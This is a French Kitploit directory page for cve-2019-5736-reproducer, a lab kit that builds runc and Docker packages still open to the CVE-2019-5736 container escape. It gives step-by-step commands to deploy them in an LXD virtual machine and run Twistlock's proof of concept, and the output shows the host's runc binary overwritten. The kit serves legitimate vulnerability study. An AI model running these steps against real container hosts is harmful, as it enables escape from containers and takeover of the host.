Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2019-5736-reproducer — Reproducteur pour CVE-2019-5736, une vulnérabilité d'évasion de conteneur RunC. Fournit des scripts de compilation et un laboratoire basé sur KVM pour confirmer l'exploit contre des paquets Docker vulnérables. | Kitploit
Outils/GitHubGitHub/takumak/cve-2019-5736-reproducer
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationSécurité CloudApprentissage et ÉducationÉvasion de Conteneur
GitHubtakumak/cve-2019-5736-reproducer

cve-2019-5736-reproducer

Reproducteur pour CVE-2019-5736, une vulnérabilité d'évasion de conteneur RunC. Fournit des scripts de compilation et un laboratoire basé sur KVM pour confirmer l'exploit contre des paquets Docker vulnérables.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
7il y a 4 ansPas encore vérifié

CVE-2019-5736 reproducteur

Cela vous permet de confirmer que RunC-CVE-2019-5736 fonctionne sur votre instance KVM.

Aperçu du workflow

  • Construire les paquets liés à docker.io vulnérables à CVE-2019-5736 dans ce dépôt
  • Lancer une instance KVM Ubuntu 18.04 sur LXD
  • Installer les paquets *.deb vulnérables dans la VM
  • Essayer la procédure présentée sur RunC-CVE-2019-5736

Construire les paquets *.deb vulnérables

root@kitploit:~
$ docker-compose build --no-cache
$ docker-compose run build

Préparer l'archive source de RunC-CVE-2019-5736

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
$ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736

Lancer une instance KVM Ubuntu 18.04 sur LXD

root@kitploit:~
$ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
$ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
root@test-cve-2019-5736:~# apt update
root@test-cve-2019-5736:~# apt install iptables libltdl7
root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb

Notez que vous devez utiliser images:ubuntu/18.04 au lieu de ubuntu:18.04 car la commande lxc exec ne fonctionne pas correctement avec cette dernière.

Reproduire RunC-CVE-2019-5736

root@kitploit:~
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
No help topic for '/usr/bin/bash'
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc

**THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->

root@test-cve-2019-5736:~/RunC-CVE-2019-5736# 

Annexe

  • Commit de correction : https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b
Télécharger l’outil